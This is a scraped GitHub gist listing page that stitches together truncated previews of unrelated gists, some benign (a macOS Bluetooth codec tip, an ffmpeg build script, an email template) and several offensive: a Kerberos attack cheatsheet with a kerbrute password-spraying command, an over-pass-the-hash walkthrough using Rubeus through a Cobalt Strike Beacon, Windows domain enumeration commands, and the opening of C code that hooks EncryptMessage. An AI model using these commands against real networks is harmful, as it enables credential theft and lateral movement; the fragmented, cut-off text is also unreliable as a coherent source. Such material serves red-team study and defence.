With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Glen Saunders glen-testing
its-a-feature
/ kerberos_attacks_cheatsheet.md
Created
September 27, 2020 21:36
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
kmcquade
/ AWS API calls that return credentials.md
Last active
March 24, 2025 11:22
AWS API calls that return credentials
dvf
/ change-codec.md
Last active
April 3, 2025 14:19
Enable High Quality mode on your headphones (Updated for macOS Catalina)
If you're using a high-end bluetooth headset on your Macbook Pro it's likely your mac is using an audio codec which favors battery efficiency over high quality. This results in a drastic degradation of sound, the SBC codec is the likely culprit, read more about it here.
- Play a song on your headphones
- Option (⌥) click the Bluetooth button at the top of your screen
- If you're using AAC or aptX, you can stop here—those are the highest quality codecs.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <style> | |
| * { | |
| font-family:Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif; | |
| } | |
| </style> | |
| </head> | |
| <body> | |
| <table cellpadding="0" cellspacing="0" class="email-wrapper" style="padding-top:32px;background-color:#ffffff;"><tbody> |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
talkingnews
/ ffmpeg_build.sh
Last active
August 21, 2024 17:52
— forked from iJackUA/ffmpeg_build.sh
Build ffmpeg and all needed codecs from latest git revisions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| sudo apt-get update -qq && sudo apt-get -y install \ | |
| autoconf \ | |
| automake \ | |
| build-essential \ | |
| cmake \ | |
| git-core \ | |
| libass-dev \ | |
| libfreetype6-dev \ |
its-a-feature
/ gist:399ad86b2c8e5032207a65af8b6858ff
Created
October 25, 2018 22:03
— forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02
Over-pass-the-hash with Rubeus and Beacon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # grab a TGT b64 blob with a valid NTLM | |
| beacon> execute-assembly /home/specter/Rubeus_4.5.exe asktgt /user:USER /rc4:NTLM_HASH | |
| # decode the base64 blob to a binary .kirbi | |
| $ base64 -d ticket.b64 > ticket.kirbi | |
| # sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
| beacon> make_token DOMAIN\USER PassWordDoesntMatter | |
| # inject the .kirbi |
This Google Apps Scripts filter will automatically move all future emails with the header
X-PHISHTESTto trash.
- Go to Google Apps Script
- Add a new script and copy paste the content from the sibling file
- Test run the script, go to View in the menu bar and click Logs
- If there's no errors it should be blank, OR a verbose message that it removed a phishing email.
its-a-feature
/ Domain Enumeration Commands
Created
January 7, 2018 21:03
Common Domain Enumeration commands in Windows, Mac, and LDAP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Domain: TEST.local | |
| User Enumeration: | |
| Windows: | |
| net user | |
| net user /domain | |
| net user [username] | |
| net user [username] /domain | |
| wmic useraccount | |
| Mac: | |
| dscl . ls /Users |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define SECURITY_WIN32 //Define First Before Imports. | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies | |
| FARPROC fpEncryptMessage; //Pointer To The Original Location | |
| BYTE bSavedByte; //Saved Byte Overwritten by 0xCC - |
NewerOlder